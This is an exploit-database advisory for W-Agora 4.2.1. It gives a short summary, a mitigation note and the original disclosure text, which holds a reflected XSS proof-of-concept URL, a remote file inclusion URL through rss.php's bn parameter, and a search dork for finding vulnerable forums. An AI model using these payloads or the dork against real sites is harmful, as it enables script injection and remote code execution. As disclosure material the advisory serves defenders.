W-Agora v.4.2.1 Multiple Vulnerabilities

vendor:

W-Agora

by:

indoushka

8,8

CVSS

HIGH

XSS and File Inclusion

79 (XSS) and 22 (File Inclusion)

CWE

Product Name: W-Agora

Affected Version From: 4.2.1

Affected Version To: 4.2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:w-agora:w-agora:4.2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

W-Agora v.4.2.1 Multiple Vulnerabilities

W-Agora v.4.2.1 is vulnerable to XSS and File Inclusion. An attacker can exploit this vulnerability by sending a malicious URL to the victim. The malicious URL contains a malicious script which will be executed when the victim visits the URL. The malicious URL also contains a file inclusion parameter which can be used to include a malicious file from a remote server. This can be used to execute arbitrary code on the victim's system.

Mitigation:

The application should be configured to validate user input and filter out any malicious scripts. The application should also be configured to only allow the inclusion of files from trusted sources.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : W-Agora v.4.2.1 Multiple Vulnerabilities                   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 2                                                
|                High  : 2                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                                                                                                
| # Dork     : Powered by Forums W-Agora                                  
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Multiple                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS

http://127.0.0.1/w-agora/profile.php?site=http127001wagora&showuser=%3Cscript%3Ealert(213771818860)%3C/script%3E
 
 2- File inclusion

http://127.0.0.1/w-agora/rss.php?site=http127001wagora&bn=http://127.0.0.1/c.txt?

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------